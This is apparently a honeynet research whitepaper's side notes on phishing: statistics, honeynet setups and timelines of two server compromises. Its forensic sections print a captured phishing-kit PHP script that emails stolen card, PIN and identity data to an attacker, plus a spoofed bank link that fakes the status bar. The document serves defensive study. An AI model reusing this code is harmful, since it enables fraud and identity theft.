Additional Informations
This side note provides further detailed background on phishing attacks, beginning with a historic overview of phishing and social engineering, and concluding with quantitative data on phishing attempts and information on high level trends.
During the 1990’s, as the popularity and take up of the Internet grew, social engineering was gradually transformed and attackers began to focus on the mass consumer market. Phishers moved from AOL to the unregulated and more anonymous Internet, with email becoming the preferred medium for engaging (often naïve) end users. One reason for this change of focus might be that online discussion forums, IRC and instant messaging were increasingly portrayed by the press as dangerous places, where evildoers and system crackers waited to ambush unsuspecting users. Also, users had become aware that legitimate companies nearly exclusively use telephone, email and traditional postal mail as means of communication with their customers, rarely participating in less formal chat sessions. Users had also become more familiar with and confident in trusting web based authentication systems, e-shopping with credit cards, online banking services and the protection offered by technologies such as Secure Sockets Layer (SSL) - all fronted by a myriad of different looking user interfaces.
Internet based email solutions continued to evolve at a rapid rate, with increasingly complex methods being offered to customise the look and feel of email messages and therefore potentially fooling unsuspecting users into trusting spoofed communications that might appear to be legitimate. When compared to established and relatively well policed closed loop systems, it still remains difficult for consumers to trace the exact origin of an SMTP mail message, and the available global user base of Internet email is many times larger. Even activities with a very low success rate can still be attractive to an attacker if the number of end users receiving the message is large enough to generate a number of responses, as can be witnessed by the continued growth in organisations willing to pay for the sending of spam and many users' own experiences of inboxes regularly full of unsolicited email.
In a more sinister turn, phishers have not only changed their primary means of communication to email, they have also started operating in a more organised manner and to target their attacks against more profitable information. In recent years, requests for AOL accounts or single credit card numbers have gradually been replaced with schemes aimed at obtaining more sensitive data, such as personal information that could allow unlimited access to online banking services or that could serve as a foundation to enable identity theft. Sensitive information to fraudulently impersonate another person’s identity might include name, date of birth, address, social security number or "secret" information such as mother's maiden name, account numbers, first school, pet’s name, user names, passwords, Personal Identification Numbers (PINs) or even one-time passwords (which are quite common in European Internet banking).
The following chart that shows the top corporate phishing targets based on responses in a recent survey of spam recipients (October 2004) by email security company CipherTrust:
[image:../images/targets.PNG size=full]
Phishing attacks have affected many users and have caused serious problems for some major banks. In extreme cases, some banks have been forced to shut down their ebanking operations for period of time due to phishing attacks. The exact cost to the banking industry of phishing attacks is not available in the public domain, and there are few well documented qualitative examples of public arrests and prosecution (such as in Estonia or Brazil), but it is likely to be substantial. In most cases banks will refund the money lost by their customers due to phishing attacks, although they reserve the right not to refund such losses at their discretion. Estimates by the Association for Payment Clearing Services (APACS) for the cost of phishing attacks against UK banks were £1M for the previous 18 months to April 2004, rising to £12M by March 2005. Australian estimates for March 2005 were A$25M, whilst Financial Insights estimates the cost to US business to be $400M in 2004. A study by Gartner estimated the cost in 2003 to be $1.2B and the number of reported phishing attacks have massively increased since then.
In October 2004 the Anti-Phishing Working Group reported that it had seen 6597 new phishing emails, an increase of 36% on the previous month. 1142 phishing web sites were reported, double the number for September and part of a "bumper month" during a period of huge growth in automated phishing attacks. Email filtering specialist MessageLabs reported that it intercepted more than 18 million phishing messages during 2004, and the graph below clearly shows the growth in attempted phishing attacks by email:
[image:../images/phishing-mails.PNG size=full]
The loss of trust, impact on consumer confidence and the associated financial costs of phishing attacks have become important enough for banks to set up web sites such as BankSafe Online to try and educate their customers, and most target brands now provide sections of their official web site with advice on identifying and avoiding online scams (such as Citizen Bank's "Online Fraud Prevention Centre" or Citibank's "Learn About Spoofs" pages ). Other organisations such as the Anti Phishing Working Group are also hoping to educate consumers as to the potential risks and teach Internet users how to avoid online scams such as phishing attacks. However, the main challenge in preventing phishing attacks is that phishing is not a pure technology problem - the major contributing factor is human nature, and as long as attackers can continue to create schemes to trick unwary users, phishing will continue to be successful and potentially lucrative. As Bruce Schneier writes in a recent weblog, even issuing all end users with two-factor authentication doesn't really help to solve the problem if the phisher is successful in tricking the users into authenticating themselves against a fake, malicious system. Given the combination of human nature, the rapid rate of technological change and the potential for illegitimate profits to be made, it seems safe to assume that the problem of phishing will get worse before it gets better.
his side note provides a more detailed overview of the two incidents discussed in the "Phishing Technique One - Phishing Through Compromised Web Servers" section of this whitepaper. One incident was catpured using a honeypot deployed by the German Honeynet Project, and the other incident was captured by a honeypot deployed by the UK Honeynet Project.
The honeynet deployed and analysed by the German Honeynet Project in the first incident formed part of a diploma thesis ("Planung und Realisierung eines Honeynet zur Analyse realer Angriffe aus dem Internet") by a graduate student at MAGELLAN Netzwerke GmbH in Cologne, Germany. The honeynet was a high interaction research honeynet deployed by the German Honeynet Project during November 2004. The honeynet topology is depicted below:
[image:../images/honeynet.png size=full]
The honeynet deployed was a typical GenII honeynet based on the three basic principles defined by the Honeynet Project: data capture, data control and data analysis.
Data capture was performed by recording all inbound and outgoing network traffic for later analysis, using packet sniffing tools such as tethereal. All network traffic to and from a RedHat Linux honeypot was mirrored via the monitor port of a network switch and logged using the popular open source Intrusion Detection System snort running in binary capture mode (as daily pcap files). To allow keystroke logging after a successful system compromise, version 2.1.7 of the Honeynet Projects Sebek kernel module was installed on the honeypot. The Redhat syslog daemon was also modified to output syslog information to the serial port for capture by the honeynet gateway.
For data control, all network traffic from the Internet was routed through a transparent bridging honeynet gateway running the FreeBSD release 4.10 operating system that limited outgoing network connections from the honeypot. Outgoing connections were identified by SYN packets, differentiated and logged by TCP connection types (such as IRC-connections), and the number of connections limited to 15 IRC-connections and 10 other TCP-connections with a 24 hour period. Connection limiting is designed to allow attackers to successfully compromise the honeypot and download a limited amount of rootkits or other malware from external servers, but to then limit their potential to attack further hosts from the compromised honeypot. It also helps to hide the presence of the honeynet gateway by not totally blocking all outbound traffic, along with preventing denial of service attacks.
For data analysis, all network traffic to or from the honeypot was mirrored to a snort IDS for pattern matching against the current signature rulebase. Manual and automated analysis of logged data was performed regularly, along with real time monitoring and alerting.
The honeynet gateway was connected to a central network switch which was used to separate network traffic from the honeypot system network and the administrative network using VLANs, a common method to logically segmented network on the same physical hardware. The honeypot itself was a standard installation of RedHat Linux version 7.1 on Intel hardware running the latest version 2.4.20 kernel with several network services such as FTP (wu-2.6.1-16), HTTP (Apache 1.3.19, OpenSSL/0.9.6) and a database (MySQL 3.23.36) server enabled. All services were left in their default configuration, except for the MySQL database which had a random secure password set for the root user. To make the system more realistic and more closely simulate a production system, a mocked up web site for an imaginary sales company was installed and reverse DNS added for the web server.
The following table depicts the timeline of the incident:
| Date / Time | Event |
| 12/11/04 | First data from honeypot |
| 22/11/04
01:06 AM |
Honeypot WU-FTPd compromised by autorooter |
| 22/11/04
08:21 AM |
Attacker manually installs rootkit, IRC bot and Ebay phishing attack content |
| 22/11/04
06:25 PM |
Attacker returns to install and run mass scanning tool |
| 22/11/04
10:40 PM |
Attacker returns to install proxy server |
| 23/11/04
02:25 PM |
Attacker returns to install additional rootkit |
| 23/11/04
04:40 PM |
Attacker returns to set up phishing web sites and sends out spam mails (blocked by Honeywall) |
| 08/12/04
11:30 AM |
Honeypot disconnected for forensic analysis |
A more detailed incident timeline, including an analysis of the tools and techniques the attackers used, is available here.
The honeynet deployed and analysed by the UK Honeynet Project in the second phishing incident was a high interaction research honeynet deployed in a UK ISP data centre during August 2004.
[image:uk-honeynet_files/image001.jpg size=full]
The UK Honeynet deployment was similar in broad outline to the German honeynet configuration detailed above, being composed of a number of physical honeypots running default installations of common UNIX operating systems on Intel and Sparc hardware. The Honeynet Projects Honeywall bootable CDROM was used for data control, providing a transparent bridging iptables firewall and using network connection rate limiting plus the snort-inline IPS to restrict outbound attack traffic. Another snort IDS provided data capture in binary pcap format, along with snort and snort-inline alerting and automated daily script based data analysis.
Individual honeypots were hosted behind the Honeywall gateway, connected to an Ethernet hub, and the Honeynet project's Sebek loadable kernel module was covertly installed and enabled on each honeypot to allow full keystroke logging. All network traffic to and from the honeypots was logged in pcap format, as were any keystrokes recorded using Sebek. Any compromised hosts were eventually taken off line and imaged for later forensic examination.
The RedHat Linux 7.3 server on Intel hardware honeypot that was compromised and used to host a phishing attack was a default CDROM based installation with a number of common network services such as Apache and samba enabled and left un-patched.
Again, a timeline of the incident is given:
| Date / Time | Event |
| 17/08/04 | First data from honeypot |
| 18/08/04
12:30 PM |
Honeypot samba server compromised. Various IRC tools, backdoors and mass scanners installed by multiple groups |
| 19/08/04 | Attackers check result of network scans |
| 20/08/04 | New attackers compromise honeypot |
| 22/08/04 | More scanning activity |
| 23/08/04 09:12 PM |
Phishers arrive through back door set up by initial attackers and set up phishing website |
| 23/08/04 09:23 PM |
First web traffic arrives at web server for phishing site |
| 27/08/04 09:30 AM |
Honeypot disconnected for forensic analysis |
A more detailed incident timeline of the UK phishing incident can be found here and more detailed analysis, including an analysis of the tools and techniques the attackers used, can be found here.
On November 12, 2004, the Honeynet was connected to the Internet. During the time between the start up and November 22, nothing special happened. We just observed an enormous number of
packets with destination port 445 which is not critical for the installed Honeypot.
At 1:16 am the Honeypot got compromised by exploiting the WU-FTP daemon. There was no port scan or FTP connection before, the first connect was used to hack the computer which is an indication of an autorooter-tool. Such tools are used to scan whole network ranges for vulnerable machines and attack everything they come across. They just deliver their "evil" payload to every system in the given address range. In our case, it was probably a tool called superwu since later on, the attacker used this tool to attack further targets from the Honeypot.
Until 8:21 am there was no activity from the attacker. Probably he started the tool the night before and checked in the morning for successful gained access. As a first step he downloaded a rootkit and installed it on the Honeypot. This script-based rootkit replaces some system binaries with trojaned files:
| /usr/bin/dir | /usr/bin/top | /bin/ps |
| /sbin/ifconfig | /usr/bin/slocate | /usr/bin/pstree |
| /bin/netstat | /usr/bin/vdir | /usr/bin/socklist |
| /usr/bin/strings | /usr/bin/chattr | /usr/sbin/lsof |
In addition, it install an SSH-daemon on port 255 which was used by the attacker to log on the Honeypot in the following. The rootkit uses source code to compile new versions of binary files. These trojaned executables are adjusted to the size of the original files of the target system to "hide" the presence. The rootkit also installs a sniffer to collect login information to other systems. Furthermore, it modifies the init-scripts to ensure that the installed services will start on next reboot and then sends out an information mail about the system status to the attacker. After finishing the installation, the attacker reentered the Honeypot via the additionally installed SSH service using the tool "putty", an SSH-Client for Windows-systems. Afterwards the attacker downloaded a file called spam.tgz. This archive contains some PHP and HTML files. Further examination showed that these files contain web-pages to update the billing profile update for seller accounts of a large Internet auctions website. The attacker copied this files into the document root of the webserver. The "index.html" start page is a forwarding page to the auctions website. The reason for that is that these PHP pages were incomplete. The attacker edited them, but never finished his work on this files. By tracing the IP of the attacker, the source could be located in Romania. A scan of this computer showed no open ports, so this could be the computer of the cracker.
At8:49 am the attacker downloaded another file: psybnc.tgz. After extracting the archive, he installed the included IRC-Bouncer and started an IRC-Session to an "undernet.org" server. The channel he entered was probably used to control hacked systems. A scan of all 8 connected clients showed the same untypical open port 255 with a listening SSH-daemon like the Honeypot had. The attacker also entered another channel and received Operator-rights there. The topic on this channel was a pointer to his personal homepage and the language used in that channel was Romanian.
At6:25 pm the attacker came back and downloaded the file windmilk.tgz. This archive contains the "superwu" autorooter. After extracting the executable binary file, he started the exploiter in a screen-session with a target network as parameter. Then the attacker detached the session and logged off. Later when he came back, he attached the session again to see the results. Since the Honeywall blocked all attacks, no systems could be compromised. The attacker did not realize the intervention, downloaded and installed at 10:40 pm a "socksify" proxy which was configured without any restrictions. With this service anybody could use the Honeypot as a proxy for spreading spam or anonymous connections to any other systems. During the honeynet's online time, it was never used.
On November 23, 2004, the attacker came back at 2:25 pm. He added the user "ro" and installed another rootkit. In a side note we present the recording of this session captured by the snort binary logging.
At 4:40 pm, the attacker downloaded the archive willson.tgz. This file includes already finished webpages similar to the spam.tgz archive. The attacker installed them in the document root directory of the webserver. Now this Honeypot could be used for phishing attacks. By calling the startup page, you get a login page that looks like the original login page. While unrelated to the incident we report, a recent example illustrating the similarity of a phishing data entry form to compare to the acutal site can be found here.
The input of this form will be rudimentary checked with the help of a small PHP-script
For both input fields (username and password), the input must be longer than one character. Note the use of the strings $mesaj and $muie, which suggests a Romanian connection and have been observed in other incidents analysed by members of the UK Honeynet Project. If the input is okay, it will be written to the file /tmp/User.doc and the next page will be shown. On this page, the victim is tricked into entering personal information. All input will be checked and if one is not according to the condition, an error page will be shown. This error page does not attempt to mimic the real error page and most victims would likely become suspicious of the fake web site at this point.
With the help of the following validation script, the data entered into the form is checked. The resulting page of the validation process is not interpreted by the webserver because Apache does not accept .dll files as PHP files by default. The attacker forgot to set the "AddType" variable of the Apache server to interpret .dll files with the PHP-engine. The next activity of the attacker was downloading an archive called banksend.tgz. This file includes a PHP script for sending mails:
After downloading the test.txt file which contained 3719 e-mail addresses, the attacker started sending phishing mails to the recipients listed in this file. The source code of this file shows the real target of the comprised link:
Please follow the link below and renew your account information. <br><br> <a href="http://XXX.XXX.XXX.XXX/Checking/login.php" onClick="popup('http://www.totalmates.com/php/click.cgi?id=xakir')" onMouseOver="window.status='https://internetbanking.bank.com';return true;" onMouseOut="window.status=' ';return true;">https://internetbanking.bank.com</a> <br> <br>
At this point of time we decided to block outgoing TCP ports 25 and 443 so that no victim would suffer from the phishing attacks. The attacker probably noticed that we blocked outgoing connections and concluded that something weird was happening. He never came back and on Decembers 8, 2004, the honeynet went offline for further analysis.
What else did we find?
We found archives which contained pre-packaged pages for other major banks. These pages are used for gathering credit card numbers from the victims. For example, in one case the form input will be checked with the help of JavaScript and the only condition is that the input fields are not blank. The next script sends the data to the attacker:
After this validation, the file processing.html shows just the text: "Thank you, Our update team will verify provided information and you will be contacted". In another bank page, we found the input will not be checked for reasonable values. Instead, it will be just send to the attacker by mail after using the "Save" button. Furthermore, we found a mailer-script for a US bank which works like the mailer-script. It is a simple PHP script that reads e-mail addresses from a separate file and sends the contents of another file. The recipient file includes 83,073 mail addresses.
This side note shows the commands issued by the phisher from the perspective of the attacker. Their actions were reconstructed with the help of the log files generated by Snort and other logged data. The first part of this side note shows a screenshot of the installation process of the rootkit, with a very "user-friendly" interface allowing easy setup. The second part shows the commands issued by the attacker once the rookit was installed, which were again reconstructed with the help of Snort log-files.
Screenshot of the rootkit installation:
[image:../../images/rootkit_screenshot.png size=full]
Commands issued by the attacker:
In this side note we analyse an example script that used to validate the information entered by users into a HTML form on a phishing web site. Initially the input data is checked to ensure that the submitted strings are valid. For example, the PIN should be four characters long and the username should not contain certain words. If the entered data passes this check, the script constructs an e-mail message containing the user's information and sends it to an address at a free e-mail provider. Finally, the location bar of the browser is updated to point to the file xxxxISAPI.dll (the file name has been obfuscated). This page will display a confirmation for the victim. In addition, a script was also included that could be used to transfer the phished information to an FTP server.
//Checking for errors in the post:
//1 - CC nr:
if(strlen($ccnumber)<16){
$error="Invalid credit card number, please re-submit.";
$errchk=1;
}
else if(strlen($ccnumber)>16&&$ccnumber{16}!=' '){
$error="Invalid credit card number, please re-submit.";
$errchk=1;
}
//2 - Email syntax:
else if(strstr($email, '@') == FALSE){
$error="Invalid email address, please re-submit.";
$errchk=2;
}
//3 - Routing number (if it does exist)
else if(strlen($bankr)>0 && strlen($bankr)<9){
$error="Invalid bank routing number, please re-submit.";
$errchk=3;
}
//4 - CVV2 check
else if(strlen($cvv2)!=3&&strlen($cvv2)!=4){
$error="Invalid card validation code, please re-submit.";
$errchk=4;
}
//4 - PIN check
else if(strlen($ccp)!=4&&strlen($ccp)!=4){
$error="Invalid pin number, please re-submit.";
$errchk=4;
}
//5 fields that should exist:
else if(strlen($username)<1){
$error="Please enter your full name and re-submit.";
$errchk=5;
}
else if(strlen($streetaddr)<1){
$error="Please enter your address and re-submit.";
$errchk=5;
}
else if(strlen($cityaddr)<1){
$error="Please enter your city and re-submit.";
$errchk=5;
}
else if(strlen($mmn)<1){
$error="Please enter your Mother Maiden Name and re-submit.";
$errchk=5;
}
else if(strlen($month)<1 || strlen($day)<1 || strlen($year)<1 ){
$error="Please enter your Date Of Birth and re-submit.";
$errchk=5;
}
//6 - Bad words check
else if(stristr($badw,$username)){
$error="ERROR - Invalid user name or password.";
$errchk=6;
}
else if(stristr($badw,$streetaddr)){
$error="ERROR - Invalid user name or password.";
$errchk=6;
}
else if(stristr($badw,$cityaddr)){
$error="ERROR - Invalid user name or password.";
$errchk=6;
}
else if(stristr($badw,$mmn)){
$error="ERROR - Invalid user name or password.";
$errchk=6;
}
//More coming soon:)
//If no error:
if($errchk==0) {
$efile=fopen("/tmp/User.doc","r");
fscanf($efile,"%s",$userid);
fscanf($efile,"%s",$pass);
fclose($efile);
$timed = date ("l dS of F Y h:i:s A");
$ip = $_SERVER["REMOTE_ADDR"];
$message="----------------------------------------------------------------------------
On $timed the user ($ip) wrote:
CreditCard Number - $ccnumber ; Month - $month ; Day - $day ; Year - $year";
$message=$message."UserId - $userid";
$message=$message."Password - $pass";
$message=$message."Email - $email";
$message=$message."Email Password - $emailp";
$message=$message."Full Name - $username";
$message=$message."Address - $streetaddr";
$message=$message."City - $cityaddr";
$message=$message."State - $stateprovaddr";
$message=$message."Zip Code - $zipcodeaddr";
$message=$message."Phone number - $phone";
$message=$message."Country - $countryaddr";
$message=$message."CVV - $cvv2";
$message=$message."Bank Name - $bank";
$message=$message."Bank Routing # - $bankr
Checking Account # - $bankc
Social Security Number - $ssn
Card PIN Number - $ccp
Mother's Maiden Name - $mmn
Date of Birth - $pibirthdatemm $pibirthdatedd $pibirthdateyy
Driver Licence Number - $dln";
mail ("xxxxxx@hotmail.com","xxEBAYxx","$message","From: tzonfi <xxxxxx@xxxxxx.com>\n");
header ("Location:xxxxISAPI.dll");
//$muie = fopen("/tmp/eb.txt", "a");
//fwrite($muie, $message);
//fclose($muie);
//include("cc-ftp.php");
exit();
}
else {
echo $error;
}
?>
The script cc-ftp.php (commented out in the data processing script above) will transfer the input to an FTP server:
In this side note we provide an overview of the source IP addresses of potential victims in the redirection phishing attack described in phishing technique two. The data below was collected with the help of the compromised German honeypot and modified redir software. Over a period of about 36 hours we observed 721 redirections of inbound HTTP requests to the honeypot, presumably recipients of a spam phishing email who were tricked into accessing the redirected content by clicking on the link provided. All are potential victims of the phishing attack, but as no personal data was captured we we cannot make an educated guess how many people actually entered sensitive information into the HTML form on the Chinese phishing web site.
| Count | Source IP address range |
|---|---|
| 28 | 203.186.X |
| 16 | 80.58.X |
| 13 | 212.138.X |
| 12 | 195.175.X |
| 9 | 61.56.X |
| 9 | 213.42.X |
| 8 | 62.220.X |
| 8 | 200.141.X |
| 8 | 195.229.X |
| 7 | 200.207.X |
| 5 | 200.226.X |
| 5 | 200.171.X |
| 5 | 142.32.X |
| 5 | 133.11.X |
| 4 | 61.19.X |
| 4 | 219.249.X |
| 4 | 203.162.X |
| 4 | 203.113.X |
| 4 | 202.129.X |
| 4 | 201.6.X |
| 4 | 200.204.X |
| 3 | 82.129.X |
| 3 | 66.173.X |
| 3 | 65.214.X |
| 3 | 216.189.X |
| 3 | 212.0.X |
| 3 | 211.248.X |
| 3 | 202.175.X |
| 3 | 200.168.X |
| 3 | 200.153.X |
| 3 | 193.95.X |
| 3 | 193.188.X |
| 3 | 163.28.X |
| 2 | 81.192.X |
| 2 | 81.168.X |
| 2 | 81.116.X |
| 2 | 80.55.X |
| 2 | 80.53.X |
| 2 | 69.56.X |
| 2 | 68.167.X |
| 2 | 67.163.X |
| 2 | 66.6.X |
| 2 | 66.250.X |
| 2 | 66.207.X |
| 2 | 66.135.X |
| 2 | 64.139.X |
| 2 | 63.70.X |
| 2 | 61.220.X |
| 2 | 61.179.X |
| 2 | 61.131.X |
| 2 | 24.106.X |
| 2 | 219.148.X |
| 2 | 218.30.X |
| 2 | 217.166.X |
| 2 | 217.14.X |
| 2 | 216.37.X |
| 2 | 216.244.X |
| 2 | 216.108.X |
| 2 | 213.212.X |
| 2 | 212.165.X |
| 2 | 211.75.X |
| 2 | 210.95.X |
| 2 | 210.212.X |
| 2 | 210.193.X |
| 2 | 210.177.X |
| 2 | 208.59.X |
| 2 | 207.250.X |
| 2 | 203.87.X |
| 2 | 203.75.X |
| 2 | 203.233.X |
| 2 | 203.177.X |
| 2 | 203.154.X |
| 2 | 203.147.X |
| 2 | 202.157.X |
| 2 | 202.138.X |
| 2 | 200.68.X |
| 2 | 200.45.X |
| 2 | 200.247.X |
| 2 | 200.216.X |
| 2 | 200.206.X |
| 2 | 200.161.X |
| 2 | 200.14.X |
| 2 | 196.40.X |
| 2 | 195.92.X |
| 2 | 193.251.X |
| 2 | 168.143.X |
| 2 | 163.27.X |
| 2 | 148.244.X |
| 2 | 148.240.X |
| 2 | 12.154.X |
| 1 | 84.9.X |
| 1 | 84.114.X |
| 1 | 82.67.X |
| 1 | 82.194.X |
| 1 | 82.156.X |
| 1 | 82.144.X |
| 1 | 82.112.X |
| 1 | 82.108.X |
| 1 | 81.86.X |
| 1 | 81.193.X |
| 1 | 81.115.X |
| 1 | 80.65.X |
| 1 | 80.51.X |
| 1 | 80.48.X |
| 1 | 80.235.X |
| 1 | 80.191.X |
| 1 | 80.183.X |
| 1 | 80.178.X |
| 1 | 80.15.X |
| 1 | 80.13.X |
| 1 | 80.132.X |
| 1 | 80.108.X |
| 1 | 69.95.X |
| 1 | 69.8.X |
| 1 | 69.88.X |
| 1 | 69.76.X |
| 1 | 69.50.X |
| 1 | 69.26.X |
| 1 | 69.201.X |
| 1 | 68.9.X |
| 1 | 68.95.X |
| 1 | 68.81.X |
| 1 | 68.60.X |
| 1 | 68.255.X |
| 1 | 68.228.X |
| 1 | 68.169.X |
| 1 | 68.164.X |
| 1 | 68.163.X |
| 1 | 68.161.X |
| 1 | 68.153.X |
| 1 | 68.122.X |
| 1 | 68.120.X |
| 1 | 67.50.X |
| 1 | 67.162.X |
| 1 | 67.132.X |
| 1 | 67.10.X |
| 1 | 67.109.X |
| 1 | 67.101.X |
| 1 | 67.100.X |
| 1 | 66.95.X |
| 1 | 66.93.X |
| 1 | 66.8.X |
| 1 | 66.69.X |
| 1 | 66.56.X |
| 1 | 66.30.X |
| 1 | 66.255.X |
| 1 | 66.23.X |
| 1 | 66.228.X |
| 1 | 66.214.X |
| 1 | 66.201.X |
| 1 | 66.178.X |
| 1 | 66.159.X |
| 1 | 66.150.X |
| 1 | 66.147.X |
| 1 | 66.0.X |
| 1 | 65.75.X |
| 1 | 65.69.X |
| 1 | 65.33.X |
| 1 | 65.202.X |
| 1 | 65.198.X |
| 1 | 65.197.X |
| 1 | 65.166.X |
| 1 | 65.115.X |
| 1 | 65.113.X |
| 1 | 64.84.X |
| 1 | 64.7.X |
| 1 | 64.76.X |
| 1 | 64.5.X |
| 1 | 64.39.X |
| 1 | 64.31.X |
| 1 | 64.2.X |
| 1 | 64.26.X |
| 1 | 64.219.X |
| 1 | 64.217.X |
| 1 | 64.205.X |
| 1 | 64.198.X |
| 1 | 64.173.X |
| 1 | 64.167.X |
| 1 | 64.166.X |
| 1 | 64.145.X |
| 1 | 64.132.X |
| 1 | 64.12.X |
| 1 | 64.114.X |
| 1 | 64.105.X |
| 1 | 63.86.X |
| 1 | 63.245.X |
| 1 | 63.209.X |
| 1 | 63.171.X |
| 1 | 63.169.X |
| 1 | 63.167.X |
| 1 | 63.162.X |
| 1 | 63.145.X |
| 1 | 63.134.X |
| 1 | 62.69.X |
| 1 | 62.39.X |
| 1 | 62.252.X |
| 1 | 62.190.X |
| 1 | 62.103.X |
| 1 | 61.62.X |
| 1 | 61.241.X |
| 1 | 61.236.X |
| 1 | 61.222.X |
| 1 | 61.221.X |
| 1 | 61.219.X |
| 1 | 61.218.X |
| 1 | 61.206.X |
| 1 | 61.197.X |
| 1 | 61.17.X |
| 1 | 61.150.X |
| 1 | 61.145.X |
| 1 | 61.138.X |
| 1 | 4.7.X |
| 1 | 4.79.X |
| 1 | 4.60.X |
| 1 | 4.42.X |
| 1 | 4.239.X |
| 1 | 38.5.X |
| 1 | 38.118.X |
| 1 | 24.74.X |
| 1 | 24.28.X |
| 1 | 24.252.X |
| 1 | 24.242.X |
| 1 | 24.220.X |
| 1 | 24.217.X |
| 1 | 24.209.X |
| 1 | 24.175.X |
| 1 | 24.167.X |
| 1 | 24.140.X |
| 1 | 24.13.X |
| 1 | 24.129.X |
| 1 | 24.11.X |
| 1 | 24.117.X |
| 1 | 24.0.X |
| 1 | 222.51.X |
| 1 | 222.35.X |
| 1 | 222.111.X |
| 1 | 221.2.X |
| 1 | 221.142.X |
| 1 | 220.80.X |
| 1 | 220.65.X |
| 1 | 220.255.X |
| 1 | 220.244.X |
| 1 | 220.172.X |
| 1 | 220.135.X |
| 1 | 220.130.X |
| 1 | 219.93.X |
| 1 | 219.89.X |
| 1 | 219.239.X |
| 1 | 219.166.X |
| 1 | 219.163.X |
| 1 | 219.161.X |
| 1 | 219.147.X |
| 1 | 219.142.X |
| 1 | 219.137.X |
| 1 | 219.133.X |
| 1 | 218.93.X |
| 1 | 218.89.X |
| 1 | 218.76.X |
| 1 | 218.5.X |
| 1 | 218.56.X |
| 1 | 218.188.X |
| 1 | 218.157.X |
| 1 | 218.152.X |
| 1 | 218.145.X |
| 1 | 218.144.X |
| 1 | 218.108.X |
| 1 | 217.95.X |
| 1 | 217.84.X |
| 1 | 217.56.X |
| 1 | 217.33.X |
| 1 | 217.172.X |
| 1 | 217.167.X |
| 1 | 217.136.X |
| 1 | 217.128.X |
| 1 | 216.86.X |
| 1 | 216.77.X |
| 1 | 216.43.X |
| 1 | 216.253.X |
| 1 | 216.250.X |
| 1 | 216.246.X |
| 1 | 216.239.X |
| 1 | 216.221.X |
| 1 | 216.191.X |
| 1 | 216.190.X |
| 1 | 216.185.X |
| 1 | 216.161.X |
| 1 | 216.155.X |
| 1 | 216.154.X |
| 1 | 216.153.X |
| 1 | 216.144.X |
| 1 | 216.139.X |
| 1 | 216.135.X |
| 1 | 216.104.X |
| 1 | 213.81.X |
| 1 | 213.56.X |
| 1 | 213.3.X |
| 1 | 213.229.X |
| 1 | 213.199.X |
| 1 | 213.186.X |
| 1 | 213.172.X |
| 1 | 213.164.X |
| 1 | 213.157.X |
| 1 | 213.132.X |
| 1 | 213.121.X |
| 1 | 212.97.X |
| 1 | 212.95.X |
| 1 | 212.55.X |
| 1 | 212.37.X |
| 1 | 212.182.X |
| 1 | 212.112.X |
| 1 | 211.92.X |
| 1 | 211.72.X |
| 1 | 211.57.X |
| 1 | 211.46.X |
| 1 | 211.38.X |
| 1 | 211.251.X |
| 1 | 211.249.X |
| 1 | 211.241.X |
| 1 | 211.23.X |
| 1 | 211.22.X |
| 1 | 211.21.X |
| 1 | 211.184.X |
| 1 | 211.167.X |
| 1 | 211.114.X |
| 1 | 211.108.X |
| 1 | 210.93.X |
| 1 | 210.90.X |
| 1 | 210.83.X |
| 1 | 210.60.X |
| 1 | 210.249.X |
| 1 | 210.187.X |
| 1 | 210.150.X |
| 1 | 210.138.X |
| 1 | 210.104.X |
| 1 | 210.100.X |
| 1 | 210.0.X |
| 1 | 209.88.X |
| 1 | 209.63.X |
| 1 | 209.58.X |
| 1 | 209.250.X |
| 1 | 209.239.X |
| 1 | 209.232.X |
| 1 | 209.226.X |
| 1 | 209.205.X |
| 1 | 209.204.X |
| 1 | 209.195.X |
| 1 | 209.183.X |
| 1 | 209.173.X |
| 1 | 209.113.X |
| 1 | 208.63.X |
| 1 | 208.62.X |
| 1 | 208.42.X |
| 1 | 208.29.X |
| 1 | 208.232.X |
| 1 | 208.203.X |
| 1 | 208.19.X |
| 1 | 208.191.X |
| 1 | 208.190.X |
| 1 | 208.16.X |
| 1 | 208.153.X |
| 1 | 208.147.X |
| 1 | 207.6.X |
| 1 | 207.69.X |
| 1 | 207.44.X |
| 1 | 207.28.X |
| 1 | 207.233.X |
| 1 | 207.212.X |
| 1 | 207.192.X |
| 1 | 207.177.X |
| 1 | 207.152.X |
| 1 | 207.121.X |
| 1 | 207.109.X |
| 1 | 206.205.X |
| 1 | 206.173.X |
| 1 | 206.163.X |
| 1 | 205.208.X |
| 1 | 205.201.X |
| 1 | 205.188.X |
| 1 | 205.145.X |
| 1 | 204.69.X |
| 1 | 203.59.X |
| 1 | 203.51.X |
| 1 | 203.252.X |
| 1 | 203.208.X |
| 1 | 203.199.X |
| 1 | 203.195.X |
| 1 | 203.185.X |
| 1 | 203.172.X |
| 1 | 203.157.X |
| 1 | 203.151.X |
| 1 | 203.145.X |
| 1 | 203.131.X |
| 1 | 203.130.X |
| 1 | 203.121.X |
| 1 | 203.112.X |
| 1 | 203.10.X |
| 1 | 202.85.X |
| 1 | 202.67.X |
| 1 | 202.5.X |
| 1 | 202.58.X |
| 1 | 202.54.X |
| 1 | 202.47.X |
| 1 | 202.39.X |
| 1 | 202.216.X |
| 1 | 202.213.X |
| 1 | 202.174.X |
| 1 | 202.169.X |
| 1 | 202.162.X |
| 1 | 202.159.X |
| 1 | 202.155.X |
| 1 | 202.14.X |
| 1 | 202.130.X |
| 1 | 202.106.X |
| 1 | 201.3.X |
| 1 | 201.2.X |
| 1 | 201.225.X |
| 1 | 201.129.X |
| 1 | 200.87.X |
| 1 | 200.85.X |
| 1 | 200.59.X |
| 1 | 200.40.X |
| 1 | 200.30.X |
| 1 | 200.253.X |
| 1 | 200.251.X |
| 1 | 200.250.X |
| 1 | 200.228.X |
| 1 | 200.212.X |
| 1 | 200.203.X |
| 1 | 200.201.X |
| 1 | 200.182.X |
| 1 | 200.165.X |
| 1 | 200.163.X |
| 1 | 200.158.X |
| 1 | 200.144.X |
| 1 | 200.12.X |
| 1 | 200.119.X |
| 1 | 200.118.X |
| 1 | 200.114.X |
| 1 | 199.80.X |
| 1 | 199.246.X |
| 1 | 199.243.X |
| 1 | 199.203.X |
| 1 | 199.174.X |
| 1 | 198.81.X |
| 1 | 198.248.X |
| 1 | 198.173.X |
| 1 | 198.165.X |
| 1 | 196.33.X |
| 1 | 195.69.X |
| 1 | 195.68.X |
| 1 | 195.61.X |
| 1 | 195.56.X |
| 1 | 195.39.X |
| 1 | 195.222.X |
| 1 | 195.205.X |
| 1 | 195.117.X |
| 1 | 194.78.X |
| 1 | 194.243.X |
| 1 | 193.253.X |
| 1 | 193.170.X |
| 1 | 192.136.X |
| 1 | 192.115.X |
